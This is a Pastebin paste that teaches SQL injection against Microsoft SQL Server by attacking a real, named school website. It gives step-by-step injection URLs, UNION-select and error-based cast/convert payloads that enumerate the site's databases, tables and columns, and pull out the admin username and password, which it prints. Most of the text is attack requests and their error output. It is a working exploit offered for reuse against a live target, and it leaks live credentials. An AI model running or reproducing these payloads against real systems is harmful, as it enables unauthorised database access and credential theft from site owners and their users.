Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- mssql server injection tutorial
- This is how i injected mssql server or .aspx.
- vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46
- 1st way:
- Finding version:
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 or 1=cast
- (@@version as int)
- Finding database:
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 or
- 1=convert(int,db_name())
- I will not go for deep about this method.There is
- already tutorial about it here.
- 2nd way:
- 1.Finding no of columns:
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 order by
- 1-- -
- it loads normal.Thats good.
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 order by
- 10-- -
- output:
- so lets reduce it
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 order by
- 9-- -
- Page loads normal.So there are 9 columns.
- 2. Next we do UnIOn all seLect .
- Remember in mssql with aspx you will never get
- vul columns.You have to find it manually.
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT 1,2,3,4,5,6,7,8,9-- -
- output:
- Dont worry.Now two ways from here.
- 1 way (easy) : this way will work rarely and its
- normal injection.
- Just change gid=46 to gid=-46 .
- so injection will be
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,2,3,4,5,6,7,8,9-- -
- output:
- [Image: 50983947.jpg]
- vul col=2
- version=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT
- 1,@@version,3,4,5,6,7,8,9-- -
- @@version gives version in mssql .
- Remember version() will not work here.
- user=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,user_name
- (),3,4,5,6,7,8,9-- -
- You can also use current_user , user ,
- system_user instead of user_name() .
- database=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,db_name
- (),3,4,5,6,7,8,9-- -
- db_name() gives primary database.
- Now replace db_name() with db_name(1),db_name
- (2),..,db_name(n) till you get databases.
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,db_name
- (1),3,4,5,6,7,8,9-- -
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,db_name
- (11),3,4,5,6,7,8,9-- -
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT
- 1,schema_name,3,4,5,6,7,8,9
- from
- information_Schema.schemata-- -
- This gives all databases in one.
- Tables=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT
- 1,table_name,3,4,5,6,7,8,9 from
- information_Schema.tables where
- table_schema!=db_name()-- -
- Here !=db_name() means other than primary
- database.
- So we get tables of other databases. spicy table is
- o_adminmst.
- columns=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT
- 1,column_name,3,4,5,6,7,8,9
- from information_Schema.columns
- where table_name='o_adminmst'--
- -
- data=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,username,3,4,5,6,7,8,9
- from o_adminmst-- -
- username=admin
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=-46 UNION all
- SELECT 1,password,3,4,5,6,7,8,9
- from o_adminmst-- -
- pass=admin123#.
- 2nd way(important) : This way will work with
- UnIoN in many sites and challenges.
- Lets You stuck here :
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT 1,2,3,4,5,6,7,8,9-- -
- Now replace all columns with NULL
- so it will like
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT
- null,null,null,null,null,null,
- null,null,null-- -
- Now starts replacing every null with convert
- (int,@@version) or cast(version() as int).
- In my case replacing with first null gives answer.
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert
- (int,@@version),null,null,null,
- null,null,null,null,null-- -
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT cast(@@version as
- int),null,null,null,null,null,
- null,null,null-- -
- user=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT cast(user_name() as
- int),null,null,null,null,null,
- null,null,null-- -
- output=
- Conversion failed when converting the nvarchar
- value 'db_ogis ' to data type int.
- You can also use current_user , user ,
- system_user instead of user_name() .
- database=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT cast(db_name() as
- int),null,null,null,null,null,
- null,null,null-- -
- output=
- Conversion failed when converting the nvarchar
- value 'db_ogis ' to data type int.
- Tables=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- table_name from
- information_schema.tables where
- table_schema!=db_name
- ())) ,null,null,null,null,null,
- null,null,null-- -
- output=Conversion failed when converting the
- nvarchar value 'o_updatemst ' to data type int.
- for next table
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- table_name from
- information_schema.tables where
- table_schema!=db_name() and
- table_name<>'o_updatemst')) ,
- null,null,null,null,null,null,
- null,null-- -
- output=Conversion failed when converting the
- nvarchar value 'o_pagemaster ' to data type int.
- columns=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- column_name from
- information_schema.columns where
- table_name='o_adminmst')) ,null,
- null,null,null,null,null,null,
- null-- -
- Conversion failed when converting the nvarchar
- value 'adminid' to data type int.
- for next column same as table
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- column_name from
- information_schema.columns where
- table_name='o_adminmst' and
- column_name<>'adminid')) ,null,
- null,null,null,null,null,null,
- null-- -
- Conversion failed when converting the nvarchar
- value 'username' to data type int.
- data=
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- username from
- o_adminmst)) ,null,null,null,
- null,null,null,null,null-- -
- Conversion failed when converting the varchar
- value 'admin' to data type int.
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- password from
- o_adminmst)) ,null,null,null,
- null,null,null,null,null-- -
- Conversion failed when converting the varchar
- value 'admin123# ' to data type int.
- You can use %2b to get username and password
- at one time.
- %2b=+
- Code:
- http://ogis.edu.in/
- ViewPhoto.aspx?gid=46 UNION all
- SELECT convert(int,(select top 1
- username%2b'/'%2bpassword from
- o_adminmst)) ,null,null,null,
- null,null,null,null,null-- -
- Conversion failed when converting the varchar
- value 'admin/admin123# ' to data type int.
- Thants it.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement